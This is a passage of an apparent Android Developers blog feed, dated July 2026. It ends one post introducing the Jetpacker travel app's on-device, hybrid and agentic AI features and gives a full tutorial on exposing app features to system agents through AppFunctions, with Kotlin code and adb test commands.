  &lt;li&gt;The &lt;b&gt;trip overview&lt;/b&gt; feature transforms a messy, multi-day itinerary into a concise, actionable summary. It leverages Gemini Nano through the &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android"&gt;ML Kit GenAI APIs&lt;/a&gt; to process data locally on the device. We consider this a nice-to-have feature where we don't want to incur extra cloud costs, making on-device inference the right choice.&lt;/li&gt;
  &lt;li&gt;The &lt;b&gt;expense tracker&lt;/b&gt; automatically extracts structured data from receipt images to help users track their travel spending. It uses the &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android/get-started#provide-multimodal"&gt;multimodal capabilities&lt;/a&gt; of Gemini Nano 4 through the ML Kit GenAI APIs. We choose an on-device solution so that any privacy-sensitive information on the receipt images never leaves the user's device.&lt;/li&gt;
  &lt;li&gt;The &lt;b&gt;audio diary &lt;/b&gt;records, transcribes, and categorizes voice notes into relevant trip activities. It is powered by the &lt;a href="https://developers.google.com/ml-kit/genai/speech-recognition/android"&gt;ML Kit Speech Recognition&lt;/a&gt; and &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android/get-started"&gt;GenAI Prompt APIs&lt;/a&gt;. We chose an on-device solution for privacy and connectivity reasons.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html" target="_blank"&gt;Cloud &amp;amp; hybrid inference&lt;/a&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPZiA1Obbj1gQKJ6S-U4UCR-jiUjasFY3jGQPeBRS27JJD5DzDIpGseazaNR3qcXR6xtYck8RYqKd0jgHGXVnfqQiPkW7jWVgTB_Hkds5EZcQDjosBZc7Ma9A-JaRaLeVxzEpTXYwSkalIyOIt-WQ_kqdlAvpDH1nB0Ajv7FdFJJ50aBOhP7a0p_RvN4/s2722/cloud-hybrid-features.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPZiA1Obbj1gQKJ6S-U4UCR-jiUjasFY3jGQPeBRS27JJD5DzDIpGseazaNR3qcXR6xtYck8RYqKd0jgHGXVnfqQiPkW7jWVgTB_Hkds5EZcQDjosBZc7Ma9A-JaRaLeVxzEpTXYwSkalIyOIt-WQ_kqdlAvpDH1nB0Ajv7FdFJJ50aBOhP7a0p_RvN4/s1600/cloud-hybrid-features.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;i&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Cloud and hybrid features in Jetpacker: Museum assistant with web grounding, hybrid restaurant review drafting, and hotel support chat featuring custom-routed live translation.&lt;/i&gt;&lt;/div&gt;&lt;/i&gt;&lt;p&gt;Sometimes your use-case requires AI models with &lt;b&gt;greater world knowledge&lt;/b&gt; or a much &lt;b&gt;larger context window&lt;/b&gt; and with greater ability in &lt;b&gt;handling complex tasks&lt;/b&gt;. In that case, we can switch from running an on-device model to using a cloud model instead.&lt;/p&gt;

&lt;p&gt;Or, if you want to get the best of both worlds, you can use hybrid inference to &lt;b&gt;dynamically choose&lt;/b&gt; either a cloud or on-device model at runtime. This allows us to &lt;b&gt;lower costs&lt;/b&gt; by moving inference to the device when it is available, but at the same time &lt;b&gt;support all Android devices&lt;/b&gt; running the app.&lt;/p&gt;

&lt;p&gt;In Jetpacker, we implemented several features using cloud or hybrid inference:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The &lt;b&gt;place Q&amp;amp;A&lt;/b&gt; feature answers user questions about specific locations by grounding responses in real-world data. It uses &lt;a href="https://firebase.google.com/docs/ai-logic"&gt;Firebase AI Logic&lt;/a&gt; integrated with &lt;a href="https://firebase.google.com/docs/ai-logic/grounding-google-maps"&gt;Google Maps&lt;/a&gt; and &lt;a href="https://firebase.google.com/docs/ai-logic/grounding-google-search"&gt;web context&lt;/a&gt;. Using a cloud model is necessary here for its greater world knowledge.&lt;/li&gt;
  &lt;li&gt;The &lt;b&gt;review drafting&lt;/b&gt; feature helps users compose detailed reviews for the places they have visited. It leverages both on-device and cloud models through Firebase AI Logic's new &lt;a href="https://firebase.google.com/docs/ai-logic/hybrid/android/get-started"&gt;Hybrid inference API&lt;/a&gt;. This is a feature we wanted to make available to all app users, so we're using a cloud model as a fallback when an on-device model is unavailable.&lt;/li&gt;
  &lt;li&gt;The &lt;b&gt;automatic chat translation&lt;/b&gt; dynamically translates chat messages in real time to facilitate seamless communication, demonstrating custom hybrid inference logic. Again, we want this feature to be available to all app users, but at the same time have some specific considerations on when to choose on-device versus cloud.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"&gt;System integration&lt;/a&gt;&lt;/h2&gt;&lt;div style="height: 0px; overflow: hidden; padding-bottom: 56.25%;"&gt;
  
  
&lt;/div&gt;
&lt;p&gt;While not a feature you see in the app itself, the Android system integration opens up the app's core capabilities directly to the Android operating system. It uses the &lt;a href="https://developer.android.com/ai/appfunctions"&gt;AppFunctions API&lt;/a&gt; to integrate with system-level intelligence.&lt;/p&gt;

&lt;h2&gt;In-app agentic workflows (coming soon!)&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3YAW_TWepCinuAvHQ7i9JKfhWtf-GSggI6CtD0Qp7-nfPA7UTmmYHTAtsEybWlmiPgxZqo_fUlqc44dmF_5WWH4tlTRze8qdsm9Jc5ARwL5k_PJjU1VTcAHRE3EdxL4JHSnsCt4VCzwPaR41LM34048icLNZLE1kUhpLTeiGpDH87Bh7utPJmXS4kn_8/s1618/agentic-feature-booking-assistant%20(1).png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3YAW_TWepCinuAvHQ7i9JKfhWtf-GSggI6CtD0Qp7-nfPA7UTmmYHTAtsEybWlmiPgxZqo_fUlqc44dmF_5WWH4tlTRze8qdsm9Jc5ARwL5k_PJjU1VTcAHRE3EdxL4JHSnsCt4VCzwPaR41LM34048icLNZLE1kUhpLTeiGpDH87Bh7utPJmXS4kn_8/w209-h400/agentic-feature-booking-assistant%20(1).png" width="209" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;The booking assistant shows several in-progress flight bookings, asking the user for input before making a final booking.&lt;/i&gt;&lt;/div&gt;&lt;/i&gt;&lt;p&gt;Agenticness introduces a higher level of&lt;b&gt; autonomy&lt;/b&gt;, enabling models to act as agents. Instead of a single inference call, an agent works towards a specific goal via an orchestration loop that allows it to &lt;b&gt;reason&lt;/b&gt;, use &lt;b&gt;tools&lt;/b&gt;, and &lt;b&gt;adapt &lt;/b&gt;its path. Depending on your requirements, these intelligent agents can run either in the cloud, directly on-device, or in a hybrid setup.&lt;/p&gt;

&lt;p&gt;For Jetpacker we added a &lt;b&gt;booking assistant&lt;/b&gt; that automates end-to-end booking workflows directly within the application to streamline reservations. It is built using &lt;a href="https://a2ui.org/"&gt;A2UI&lt;/a&gt; and &lt;a href="https://adk.dev/"&gt;ADK&lt;/a&gt; running in the cloud. The Android app functions as a front-end to the multi-agentic system running in the cloud.&lt;/p&gt;

&lt;h2&gt;Learn more&lt;/h2&gt;
&lt;p&gt;Check out the other parts of this blog post series:&lt;/p&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html"&gt;&lt;b&gt;Part 1 (this post!):&lt;/b&gt;&lt;/a&gt; Introduction of the app and a high-level overview.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;&lt;b&gt;Part 2:&lt;/b&gt;&lt;/a&gt; On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"&gt;&lt;b&gt;Part 3:&lt;/b&gt;&lt;/a&gt; Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"&gt;&lt;b&gt;Part 4:&lt;/b&gt;&lt;/a&gt; System integration. Integrating with the Android intelligence system using AppFunctions.&lt;br /&gt;Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.&lt;p&gt;Interested in more on Android Development? Follow Android Developers on &lt;a href="https://www.youtube.com/@AndroidDevelopers"&gt;YouTube&lt;/a&gt; or &lt;a href="https://www.linkedin.com/showcase/androiddev/"&gt;LinkedIn&lt;/a&gt;!&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-21T13:00:00+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBFwd7rJO49I_puODKBWFqPbpHaGyL3CTFuZBbr0HTQConFnc3JP0dL9Rr_i6wmyW0o4Ku2bvv3SEacwpC3Vc6b7cYy0aRbZKdUDudFcraYO8zcBVkrMfbrfMP9How0J1xSi91xLnR4s5Z3s-Lp6RF2SA0gU56B9nXD0NkD_CU8MT6wbgBw1tRaMWcMo/s72-c/0713%20Jetpacker%20Meta.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBFwd7rJO49I_puODKBWFqPbpHaGyL3CTFuZBbr0HTQConFnc3JP0dL9Rr_i6wmyW0o4Ku2bvv3SEacwpC3Vc6b7cYy0aRbZKdUDudFcraYO8zcBVkrMfbrfMP9How0J1xSi91xLnR4s5Z3s-Lp6RF2SA0gU56B9nXD0NkD_CU8MT6wbgBw1tRaMWcMo/s72-c/0713%20Jetpacker%20Meta.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBFwd7rJO49I_puODKBWFqPbpHaGyL3CTFuZBbr0HTQConFnc3JP0dL9Rr_i6wmyW0o4Ku2bvv3SEacwpC3Vc6b7cYy0aRbZKdUDudFcraYO8zcBVkrMfbrfMP9How0J1xSi91xLnR4s5Z3s-Lp6RF2SA0gU56B9nXD0NkD_CU8MT6wbgBw1tRaMWcMo/s72-c/0713%20Jetpacker%20Meta.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html</id>
    <title>Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions</title>
    <updated>2026-07-21T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png" style="display: none;" /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Posted by Ben Weiss, Senior Developer Relations Engineer,&amp;nbsp;Android Developer Relations&lt;/i&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Welcome back to the blog post series "&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank"&gt;Build intelligent Android apps&lt;/a&gt;" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our &lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"&gt;previous post&lt;/a&gt;,&amp;nbsp;we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.&lt;/p&gt;Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

&lt;p&gt;In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, &lt;a href="https://github.com/android/jetpacker"&gt;JetPacker&lt;/a&gt;, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.&lt;/p&gt;

&lt;h2&gt;Designing AI-ready features: making choices that matter for your users&lt;/h2&gt;

&lt;p&gt;To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.&lt;/p&gt;

&lt;div class="vertical-video-grid"&gt;
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="vertical-video-wrapper"&gt;&lt;br /&gt;&lt;/div&gt;

&lt;p&gt;Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the &lt;code&gt;addExpense&lt;/code&gt; and &lt;code&gt;getExpenses&lt;/code&gt; features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.&lt;/p&gt;

&lt;p&gt;We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing &lt;code&gt;getItinerary&lt;/code&gt; and &lt;code&gt;addItineraryEvent&lt;/code&gt; to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
  

&lt;p&gt;Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database&amp;nbsp;&lt;span face="Roboto, sans-serif" style="color: #073042; font-size: 11pt; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"&gt;&amp;nbsp;using the &lt;/span&gt;&lt;span&gt;addVoiceNote&lt;/span&gt;&lt;span face="Roboto, sans-serif" style="color: #073042; font-size: 11pt; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"&gt; AppFunction.&lt;/span&gt;&lt;/p&gt;

&lt;h2&gt;Android MCP powered by AppFunctions&lt;/h2&gt;This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://d.android.com/ai/appfunctions"&gt;Android AppFunctions&lt;/a&gt; is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;i&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.&lt;/i&gt;&lt;/div&gt;&lt;/i&gt;&lt;p&gt;Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.&lt;/p&gt;

&lt;p&gt;When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.&lt;/p&gt;

&lt;h2&gt;How we accelerated development with Android skills&lt;/h2&gt;

To streamline the integration process, we leveraged the &lt;a href="https://github.com/android/skills/tree/main/device-ai/appfunctions"&gt;AppFunctions development skill&lt;/a&gt;. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary &lt;code&gt;Service&lt;/code&gt; entry points, refining our &lt;code&gt;KDoc&lt;/code&gt; documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

&lt;h2&gt;Providing app features to the intelligence system&lt;/h2&gt;

&lt;p&gt;Enough with the theory, let's dive into the implementation.&lt;/p&gt;

&lt;h4&gt;Configuration and dependency setup&lt;/h4&gt;

&lt;p&gt;We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")&lt;/code&gt;&lt;/pre&gt;

&lt;h4&gt;Modeling custom data types&lt;/h4&gt;

&lt;p&gt;Any custom object exchanged with the agent must be annotated with &lt;code&gt;@AppFunctionSerializable&lt;/code&gt;. In our &lt;a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt"&gt;TripSerializable.kt&lt;/a&gt; file, we define our trip data model:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&amp;lt;String&amp;gt;,
)&lt;/code&gt;&lt;/pre&gt;

&lt;h4&gt;Providing features using the @AppFunction annotation&lt;/h4&gt;

&lt;p&gt;Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with &lt;code&gt;@AppFunction&lt;/code&gt;. We can view this in searchTrip:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&amp;lt;TripSerializable&amp;gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Since AppFunctions run on the UI thread by default, we use &lt;code&gt;withContext(Dispatchers.IO)&lt;/code&gt; to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.&lt;/p&gt;

&lt;h4&gt;The service entry point and Hilt integration&lt;/h4&gt;

&lt;p&gt;To register these features with the intelligence system, we create an abstract base class that extends &lt;code&gt;AppFunctionService&lt;/code&gt;. We annotate it with &lt;code&gt;@AppFunctionServiceEntryPoint&lt;/code&gt;:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;During compilation, KSP generates the final concrete service subclass, &lt;code&gt;JetPackerAppFunctionService&lt;/code&gt;, as declared with the &lt;code&gt;serviceName&lt;/code&gt; parameter. We also register &lt;code&gt;app_metadata.xml&lt;/code&gt; in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.&lt;/p&gt;

&lt;h2&gt;Testing and verifying your AppFunctions&lt;/h2&gt;

&lt;p&gt;Once implemented, you should verify that your AppFunctions are registered and working correctly.&lt;/p&gt;

&lt;p&gt;Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running &lt;code&gt;adb shell cmd app_function list-app-functions&lt;/code&gt; displays all registered functions for your package. You can then execute a specific function and test its database integration by running &lt;code&gt;adb shell cmd app_function execute-app-function&lt;/code&gt; while passing a raw JSON parameters string.&lt;/p&gt;

&lt;p&gt;Instead of these ADB commands, you can also use the &lt;a href="https://github.com/android/appfunctions"&gt;AppFunctions Testing Agent&lt;/a&gt; to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.&lt;/p&gt;

&lt;h2&gt;Wrapping it up&lt;/h2&gt;

&lt;p&gt;When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..&lt;/p&gt;

&lt;p&gt;First, the &lt;a href="https://github.com/android/skills/tree/main/device-ai/appfunctions"&gt;AppFunctions development skill&lt;/a&gt; is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.&lt;/p&gt;

&lt;p&gt;Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!&lt;/p&gt;

&lt;h2&gt;Learn more&lt;/h2&gt;

&lt;p&gt;Check out the other parts of this blog post series:&lt;br /&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html"&gt;Part 1:&lt;/a&gt;&lt;/b&gt; Introduction of the app and a high-level overview.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;&lt;b&gt;Part 2:&lt;/b&gt;&lt;/a&gt; On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.&lt;br /&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"&gt;Part 3:&lt;/a&gt;&lt;/b&gt; Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.&lt;br /&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"&gt;&lt;b&gt;Part 4 (this post!):&lt;/b&gt;&lt;/a&gt; System integration. Integrating with the Android intelligence system using AppFunctions. &lt;br /&gt;Part 5 (coming soon):&amp;nbsp;In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.&lt;/p&gt;

&lt;p&gt;Interested in more on Android Development? Follow Android Developers on &lt;a href="https://www.youtube.com/@AndroidDevelopers"&gt;YouTube&lt;/a&gt; or &lt;a href="https://www.linkedin.com/showcase/androiddev/"&gt;LinkedIn&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;
  All code snippets in this blog post follow the following copyright notice:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-21T13:00:00+00:00</published>
    <media:group>
